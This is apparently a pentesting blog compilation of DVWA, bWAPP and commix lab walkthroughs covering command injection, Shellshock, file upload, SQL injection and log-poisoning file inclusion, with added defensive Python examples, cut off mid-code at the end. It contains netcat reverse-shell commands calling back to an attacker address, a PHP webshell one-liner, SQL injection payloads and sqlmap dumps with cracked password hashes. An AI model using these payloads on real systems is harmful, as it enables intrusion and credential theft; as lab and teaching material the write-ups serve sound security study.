    (41) 'postgres' is regular user (uid=121). Home directory is in '/var/lib/postgresql'.
[*] Fetching '/etc/shadow' to enumerate users password hashes... [ FAILED ]

Read a file from the target host

python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --file-read="/etc/passwd"

To read a file from the remote host use the --file-read option. Commix joins the lines of the file with spaces in its output, which is why /etc/passwd appears as one run-on block below.

sam@ubuntu:~/pentest/commix$ python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --file-read="/etc/passwd"
[+] The GET parameter 'addr' seems injectable via (results-based) classic command injection technique.
    [~] Payload: ;echo BCWTSZ$((34+37))$(echo BCWTSZ)BCWTSZ
[+] The contents of file '/etc/passwd': root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin 
syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin uuidd:x:105:110::/run/uuidd:/usr/sbin/nologin 
avahi-autoipd:x:106:111:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin 
lightdm:x:110:115:Light Display Manager:/var/lib/lightdm:/bin/false speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false whoopsie:x:112:119::/nonexistent:/bin/false kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin 
saned:x:114:121::/var/lib/saned:/usr/sbin/nologin pulse:x:115:122:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin 
avahi:x:116:124:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin colord:x:117:125:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false 
sam:x:1000:1000:sam,,,:/home/sam:/bin/bash cups-pk-helper:x:119:118:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin mysql:x:120:128:MySQL Server,,,:/nonexistent:/bin/false postgres:x:121:129:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

Write to a file on the target host

python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --file-write="shell.php" --file-dest="/tmp/shell.php"

To write a file to the remote host use the --file-write option for the local file to send and --file-dest for the path to write it to on the target.

sam@ubuntu:~/pentest/commix$ python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --file-write="shell.php" --file-dest="/tmp/shell.php"
[+] The GET parameter 'addr' seems injectable via (results-based) classic command injection technique.
    [~] Payload: ;echo BCWTSZ$((34+37))$(echo BCWTSZ)BCWTSZ
[+] The /tmp/shell.php file was created successfully!

Execute a single operating system command

python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --os-cmd="tail /etc/passwd"

To execute a single command on the remote host and get its output back use the --os-cmd option.

sam@ubuntu:~/pentest/commix$ python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --os-cmd="tail /etc/passwd"
[+] The GET parameter 'addr' seems injectable via (results-based) classic command injection technique.
    [~] Payload: ;echo BCWTSZ$((34+37))$(echo BCWTSZ)BCWTSZ

kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin saned:x:114:121::/var/lib/saned:/usr/sbin/nologin pulse:x:115:122:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin avahi:x:116:124:Avahi 
mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin colord:x:117:125:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false 
sam:x:1000:1000:sam,,,:/home/sam:/bin/bash cups-pk-helper:x:119:118:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin mysql:x:120:128:MySQL Server,,,:/nonexistent:/bin/false 
postgres:x:121:129:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

[*] Fetched data logged to text files under '/home/sam/pentest/commix/.output/127.0.0.1/logs.txt'.

Shellshock vulnerability exploitation

python commix.py --url="http://192.168.56.101/bWAPP/cgi-bin/shellshock.sh" --shellshock

We can exploit the Shellshock vulnerability (CVE-2014-6271) in bWAPP's CGI script easily with commix and the --shellshock option. The payload travels in HTTP request headers, which the CGI handler exports as environment variables before a vulnerable bash parses them.

sam@ubuntu:~/pentest/commix$ python commix.py --url="http://192.168.56.101/bWAPP/cgi-bin/shellshock.sh" --shellshock

Pseudo-Terminal (type '?' for available options)
commix(os_shell) > id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

commix(os_shell) > whoami

www-data

commix(os_shell) > 

Saturday, February 8, 2020

DVWA: File Upload

Our goal is to exploit the weakness in file upload checking and obtain a remote system shell on the host.

We start off with the security level set to low, so there is an unrestricted file upload vulnerability here.

As you can see our file was uploaded successfully. Let's next move on to the medium security level and try to upload a remote shell to the host.

As you can see we had to edit the filename in the POST request to the server so that the php extension is the only extension in the filename.

We got a successful upload. Now let's visit the directory where the file resides and try to run some commands with it.

All that's left to do is get a connect-back shell from the remote host. We can set that up using a netcat listener.

/1.php?cmd=nc -e /bin/sh 192.168.56.1 8088
sam@ubuntu:~$ nc -lvp 8088
Listening on [0.0.0.0] (family 0, port 8088)
Connection from 192.168.56.101 54057 received!
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@metasploitable:/var/www/dvwa/hackable/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@metasploitable:/var/www/dvwa/hackable/uploads$ whoami
whoami
www-data
www-data@metasploitable:/var/www/dvwa/hackable/uploads$ 
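The low and medium levels fail because the server trusts the client-supplied filename and Content-Type. As an added example (not DVWA's code and not from this post), here is a Python upload validator that checks the extension allowlist, the Content-Type and the file's magic bytes together, run over constructed upload attempts that reuse the '1.php' name and the PHP one-liner seen on this page; the JPEG bytes and the sample names are constructed.

```python
import os
import secrets

# Extension allowlist with the magic bytes each file type must start with.
MAGIC = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}


class UploadRejected(ValueError):
    pass


def validate_upload(filename, content_type, data):
    """Return a server-chosen filename for an acceptable image upload, or
    raise UploadRejected. Filename and Content-Type both come from the client
    (the medium-level bypass above is exactly editing them in the POST), so
    neither is trusted on its own: the bytes must agree with the extension."""
    base = os.path.basename(filename.replace("\\", "/"))  # drop any client-supplied path
    ext = os.path.splitext(base)[1].lower()
    if ext not in MAGIC:
        raise UploadRejected("extension %r is not an allowed image type" % ext)
    if not content_type.lower().startswith("image/"):
        raise UploadRejected("unexpected Content-Type %r" % content_type)
    if not data.startswith(MAGIC[ext]):
        raise UploadRejected("file content does not match %s" % ext)
    if b"<?php" in data or b"<?=" in data:
        # defence in depth: a valid image header followed by PHP is still
        # dangerous if the upload directory is ever served with PHP enabled
        raise UploadRejected("embedded PHP tag in image data")
    # never reuse the client's name; store under a random one (and, ideally,
    # outside the web root with script execution disabled)
    return secrets.token_hex(8) + ext


# Constructed upload attempts; the first two reuse the "1.php" name and the
# PHP one-liner that appear on this page.
WEBSHELL = b"<?php system($_GET[c]);?>"
JPEG_BYTES = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
SAMPLES = [
    ("1.php", "application/x-php", WEBSHELL),            # low level: no check at all
    ("1.php", "image/jpeg", WEBSHELL),                   # forged Content-Type only
    ("1.php.jpg", "image/jpeg", WEBSHELL),               # allowed extension, wrong bytes
    ("photo.jpg", "image/jpeg", JPEG_BYTES + WEBSHELL),  # real header, PHP appended
    ("photo.jpg", "image/jpeg", JPEG_BYTES),             # genuine image
]


def screen_uploads(samples):
    """Run every sample through validate_upload; return one verdict per sample."""
    verdicts = []
    for name, ctype, data in samples:
        try:
            validate_upload(name, ctype, data)
            verdicts.append("accepted")
        except UploadRejected as exc:
            verdicts.append("rejected: %s" % exc)
    return verdicts


if __name__ == "__main__":
    for (name, _, _), verdict in zip(SAMPLES, screen_uploads(SAMPLES)):
        print("%-12s %s" % (name, verdict))
```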

DVWA: Command Injection

Our goal is to successfully exploit the command injection vulnerability and get local shell access on the remote host.

127.0.0.1;id

As you can see we are able to execute commands on the remote server. Let's next move on to getting a connect-back shell using netcat.

nc -e /bin/sh 192.168.56.1 8088

As you can see we got a successful connect back and local system shell on the remote host.

sam@ubuntu:~$ nc -lvp 8088
Listening on [0.0.0.0] (family 0, port 8088)
Connection from 192.168.56.101 40718 received!
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ 
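Both the commix run earlier and the '127.0.0.1;id' payload here work because the application splices the request parameter into a shell command string. As an added example (not DVWA's, commix's or this post's code), here is that unsafe pattern beside a hardened version, plus a detector run over constructed access-log lines carrying the two payloads from this page; the DVWA parameter name 'ip' and the log lines are assumptions.

```python
import ipaddress
import re
import urllib.parse

# Constructed Apache-style log lines (not real captures). The second and third
# carry, URL-encoded, the two injection payloads shown on this page: DVWA's
# "127.0.0.1;id" and commix's results-based probe. The "ip" parameter name is
# an assumption about the DVWA exec page.
ACCESS_LOG = [
    '192.168.56.1 - - [08/Feb/2020:09:30:01 -0700] "GET /dvwa/vulnerabilities/exec/?ip=127.0.0.1&Submit=Submit HTTP/1.1" 200 4321',
    '192.168.56.1 - - [08/Feb/2020:09:30:05 -0700] "GET /dvwa/vulnerabilities/exec/?ip=127.0.0.1%3Bid&Submit=Submit HTTP/1.1" 200 4410',
    '192.168.56.1 - - [08/Feb/2020:09:30:09 -0700] "GET /~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=%3Becho%20BCWTSZ%24%28%2834%2B37%29%29%24%28echo%20BCWTSZ%29BCWTSZ HTTP/1.1" 200 512',
]


def build_ping_unsafe(addr):
    """The vulnerable pattern: the request parameter is spliced into a shell
    command string. A ';' or '$( )' in the input ends the ping and starts a
    new command. Returned as a string only; never run this through a shell."""
    return "ping -c 3 " + addr


def build_ping_safe(addr):
    """Hardened form: accept only a syntactically valid IP address and hand it
    to the program as a single argv element, so no shell ever parses it."""
    try:
        ip = ipaddress.ip_address(addr.strip())
    except ValueError as exc:
        raise ValueError("not an IP address: %r" % addr) from exc
    # run with subprocess.run(argv) and no shell=True
    return ["ping", "-c", "3", str(ip)]


# Characters that separate or substitute commands in sh; none of them belongs
# in a hostname or IP address parameter.
SHELL_META = re.compile(r"[;&|`\n]|\$\(")

# client, method and request-target from the quoted request field
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)')


def find_injection_attempts(lines):
    """Decode every query-string value of every request and report the ones
    that contain shell metacharacters. Returns a list of dicts."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, _method, target = m.groups()
        query = urllib.parse.urlsplit(target).query
        params = urllib.parse.parse_qs(query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                if SHELL_META.search(value):
                    hits.append({"client": client, "param": name, "value": value})
    return hits


if __name__ == "__main__":
    print(build_ping_unsafe("127.0.0.1;id"))
    print(build_ping_safe("127.0.0.1"))
    for hit in find_injection_attempts(ACCESS_LOG):
        print("%(client)s injected %(param)s=%(value)r" % hit)
```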

DVWA: SQL Injection (Blind) with sqlmap

We start off by getting the database names hosted on the remote server.

sam@ubuntu:~/pentest/sqlmap$ python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" \
--cookie="security=low; security_level=0; SESScb1b7e2ce310cad2d8cf9c0927abc1d2=MV1sLFVZrY2dZo0xoPjTzVnXEhlkh0ak8SAGpW6FnHc; PHPSESSID=eb817a6889038ed52e8fb18c79dcbfa7" \
--dbs
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 8474 FROM (SELECT(SLEEP(5)))aqwP) AND 'wCgT'='wCgT&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x7178716a71,0x70637a4378626f434d4e6478776d70756b43544e5a6862434778454f6e586154626168457a4d6a4e,0x71707a7071),NULL-- -&Submit=Submit
---
[09:21:06] [INFO] the back-end DBMS is MySQL
[09:21:06] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:21:06] [INFO] fetching database names
available databases [7]:
[*] dvwa
[*] information_schema
[*] metasploit
[*] mysql
[*] owasp10
[*] tikiwiki
[*] tikiwiki195

[09:21:06] [INFO] fetched data logged to text files under '/home/sam/.sqlmap/output/192.168.56.101'

[*] ending @ 09:21:06 /2020-02-08/

sam@ubuntu:~/pentest/sqlmap$ 

As you can see we have seven databases to choose from, but for now we will focus on the 'dvwa' database.

sam@ubuntu:~/pentest/sqlmap$ python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" \
--cookie="security=low; security_level=0; SESScb1b7e2ce310cad2d8cf9c0927abc1d2=MV1sLFVZrY2dZo0xoPjTzVnXEhlkh0ak8SAGpW6FnHc; PHPSESSID=eb817a6889038ed52e8fb18c79dcbfa7" \
-D dvwa --tables
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.2.26#dev}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:23:50 /2020-02-08/

[09:23:50] [INFO] resuming back-end DBMS 'mysql' 
[09:23:50] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 8474 FROM (SELECT(SLEEP(5)))aqwP) AND 'wCgT'='wCgT&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x7178716a71,0x70637a4378626f434d4e6478776d70756b43544e5a6862434778454f6e586154626168457a4d6a4e,0x71707a7071),NULL-- -&Submit=Submit
---
[09:23:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:23:50] [INFO] fetching tables for database: 'dvwa'
[09:23:50] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[09:23:50] [INFO] fetched data logged to text files under '/home/sam/.sqlmap/output/192.168.56.101'

[*] ending @ 09:23:50 /2020-02-08/

sam@ubuntu:~/pentest/sqlmap$ 

We have two tables in the dvwa database. Let's look at the table 'users'.

sam@ubuntu:~/pentest/sqlmap$ python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" \
--cookie="security=low; security_level=0; SESScb1b7e2ce310cad2d8cf9c0927abc1d2=MV1sLFVZrY2dZo0xoPjTzVnXEhlkh0ak8SAGpW6FnHc; PHPSESSID=eb817a6889038ed52e8fb18c79dcbfa7" \
-D dvwa -T users --columns
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.4.2.26#dev}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:25:03 /2020-02-08/

[09:25:03] [INFO] resuming back-end DBMS 'mysql' 
[09:25:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 8474 FROM (SELECT(SLEEP(5)))aqwP) AND 'wCgT'='wCgT&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x7178716a71,0x70637a4378626f434d4e6478776d70756b43544e5a6862434778454f6e586154626168457a4d6a4e,0x71707a7071),NULL-- -&Submit=Submit
---
[09:25:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:25:04] [INFO] fetching columns for table 'users' in database 'dvwa'
[09:25:04] [WARNING] reflective value(s) found and filtering out
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| user       | varchar(15) |
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user_id    | int(6)      |
+------------+-------------+

[09:25:04] [INFO] fetched data logged to text files under '/home/sam/.sqlmap/output/192.168.56.101'

[*] ending @ 09:25:04 /2020-02-08/

sam@ubuntu:~/pentest/sqlmap$

OK, we got back the column names for the users table. Let's fetch the user and password columns and dump their contents.

sam@ubuntu:~/pentest/sqlmap$ python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" \
--cookie="security=low; security_level=0; SESScb1b7e2ce310cad2d8cf9c0927abc1d2=MV1sLFVZrY2dZo0xoPjTzVnXEhlkh0ak8SAGpW6FnHc; PHPSESSID=eb817a6889038ed52e8fb18c79dcbfa7" \
-D dvwa -T users -C user,password --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.2.26#dev}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:26:54 /2020-02-08/

[09:26:54] [INFO] resuming back-end DBMS 'mysql' 
[09:26:54] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 8474 FROM (SELECT(SLEEP(5)))aqwP) AND 'wCgT'='wCgT&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x7178716a71,0x70637a4378626f434d4e6478776d70756b43544e5a6862434778454f6e586154626168457a4d6a4e,0x71707a7071),NULL-- -&Submit=Submit
---
[09:26:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:26:54] [INFO] fetching entries of column(s) '`user`, password' for table 'users' in database 'dvwa'
[09:26:54] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[09:26:54] [WARNING] reflective value(s) found and filtering out
[09:26:54] [INFO] retrieved: '1337','8d3533d75ae2c3966d7e0d4fcc69216b'
[09:26:54] [INFO] retrieved: 'admin','5f4dcc3b5aa765d61d8327deb882cf99'
[09:26:55] [INFO] retrieved: 'gordonb','e99a18c428cb38d5f260853678922e03'
[09:26:55] [INFO] retrieved: 'pablo','0d107d09f5bbe40cade3de5c71e9e9b7'
[09:26:55] [INFO] retrieved: 'smithy','5f4dcc3b5aa765d61d8327deb882cf99'
[09:26:55] [INFO] recognized possible password hashes in column 'password'     
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[09:27:07] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/home/sam/pentest/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[09:27:17] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[09:27:22] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[09:27:22] [INFO] starting 4 processes 
[09:27:26] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[09:27:27] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[09:27:33] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[09:27:36] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
Database: dvwa                                                                 
Table: users
[5 entries]
+---------+---------------------------------------------+
| user    | password                                    |
+---------+---------------------------------------------+
| 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   |
| pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------+---------------------------------------------+

[09:27:42] [INFO] table 'dvwa.users' dumped to CSV file '/home/sam/.sqlmap/output/192.168.56.101/dump/dvwa/users.csv'
[09:27:42] [INFO] fetched data logged to text files under '/home/sam/.sqlmap/output/192.168.56.101'

[*] ending @ 09:27:42 /2020-02-08/

sam@ubuntu:~/pentest/sqlmap$ 

As you can see we successfully dumped the user and password columns and even cracked the hashes that were stored in the database.

DVWA: SQL Injection

Our goal is to exploit the SQL injection vulnerability and extract user data from the database.

%' or '1'='1

As you can see we got a true condition from the query we injected. Our next task is to see how many columns are in the current table.

%' order by 3 #

There is no third column in this table, so let's construct a query using only two columns and see if we can find the visible columns to extract data from.

%' union select 1,2#

We see the two columns we can use to extract data. Let's first get the version of the MySQL server running on the remote host.

%' or 0=0 union select null, version() #

We see the version of the MySQL server at the very bottom of the screen. Let's now go about getting the names of the tables in the current database.

%' and 1=0 union select null, table_name from information_schema.tables #

We got the table names and we see the table 'users'. Let's move on to the column names of the users table.

%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users'#

As you can see we got the column names for the table 'users'. Let's now extract some data from the database.

%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

We got first name, last name, username and password from the database.
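Both the sqlmap dump and the manual UNION queries above succeed because the 'id' parameter is concatenated into the SQL text, and the dump was cracked in seconds because the passwords were unsalted MD5. As an added example (not DVWA's or this post's code), here is the concatenated query beside a parameterized one, run against a constructed in-memory SQLite table shaped like dvwa.users with the page's "%' or '1'='1" payload, plus a salted PBKDF2 replacement for the MD5 storage; the rows and the PBKDF2 format string are constructed.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed rows with the shape of the dvwa.users table dumped above
# (user_id, user, first_name, last_name). The names are sample data.
ROWS = [
    (1, "admin", "admin", "admin"),
    (2, "gordonb", "Gordon", "Brown"),
    (3, "1337", "Hack", "Me"),
    (4, "pablo", "Pablo", "Picasso"),
    (5, "smithy", "Bob", "Smith"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, user TEXT, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, user_id):
    """DVWA-style: the request parameter is concatenated into the SQL text, so
    a quote in the input rewrites the WHERE clause and "%' or '1'='1" returns
    every row."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """Fixed form: the value travels as a bound parameter and is never parsed
    as SQL, so the same payload is just a string that matches no user_id."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def hash_password(password, iterations=100_000):
    """Salted PBKDF2-HMAC-SHA256 from the standard library. Unlike the unsalted
    MD5 in the dump above (admin and smithy share one hash), two users with the
    same password get different hashes, and every guess costs the cracker
    `iterations` hash operations instead of one. Storage format is constructed."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(password, stored):
    _algo, iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    conn = make_db()
    payload = "%' or '1'='1"
    print("concatenated:", lookup_vulnerable(conn, payload))
    print("parameterized:", lookup_parameterized(conn, payload))
    stored = hash_password("password")
    print(stored, verify_password("password", stored))
```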

DVWA: Local File Inclusion to Shell using auth.log

Our goal is to exploit the local file include vulnerability and gain shell access to the remote machine.

We see that the 'page' parameter is vulnerable to local file inclusion. Let's try to include /etc/passwd and see if we have any luck.

We first need to poison a log file in order to get remote code execution. For this we will use the auth.log file and try to log in over SSH with our PHP code as the username.

sam@ubuntu:~$ ssh '<?php system($_GET['c']);?>'@192.168.56.101
The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established.
RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.101' (RSA) to the list of known hosts.
<?php system($_GET[c]);?>@192.168.56.101's password: 
Permission denied, please try again.
<?php system($_GET[c]);?>@192.168.56.101's password: 
Permission denied, please try again.
<?php system($_GET[c]);?>@192.168.56.101's password: 
<?php system($_GET[c]);?>@192.168.56.101: Permission denied (publickey,password).
sam@ubuntu:~$ 

As you can see we tried logging in with the PHP code as our username. What should happen now is that our PHP code is written to the auth.log file, and when we include that file through the local file inclusion the PHP code will be interpreted and run, giving us a command shell to work with.

http://192.168.56.101/dvwa/vulnerabilities/fi/?page=/var/log/auth.log&c=uname%20-a

If we include the page we see the output of the uname command.

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Our next step is to try to get a reverse connect shell on the remote host. For this we will use netcat.

sam@ubuntu:~$ nc -l -v -p 8088
Listening on [0.0.0.0] (family 0, port 8088)
Connection from 192.168.56.101 35239 received!
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@metasploitable:/var/www/dvwa/vulnerabilities/fi$ whoami
whoami
www-data
www-data@metasploitable:/var/www/dvwa/vulnerabilities/fi$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@metasploitable:/var/www/dvwa/vulnerabilities/fi$ 

As you can see we got a reverse connect shell back to us and now have a system prompt we can work from.
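The chain above leaves two traces a defender can watch for: a PHP open tag inside sshd's auth.log entries, and a 'page' parameter that names an absolute path. As an added example (not DVWA's or this post's code), here is a Python check over constructed auth.log and web-server lines modelled on the failed logins and the include request shown above, together with the application-side fix of resolving 'page' against a fixed allowlist; the log lines, the PIDs and the allowed page names are assumptions.

```python
import re
import urllib.parse

# Constructed sshd lines modelled on what the failed logins above leave in
# /var/log/auth.log (sshd logs the attempted username verbatim), plus one
# ordinary successful login.
AUTH_LOG = [
    "Feb  8 10:12:01 metasploitable sshd[4711]: Invalid user <?php system($_GET[c]);?> from 192.168.56.1",
    "Feb  8 10:12:03 metasploitable sshd[4711]: Failed password for invalid user <?php system($_GET[c]);?> from 192.168.56.1 port 50234 ssh2",
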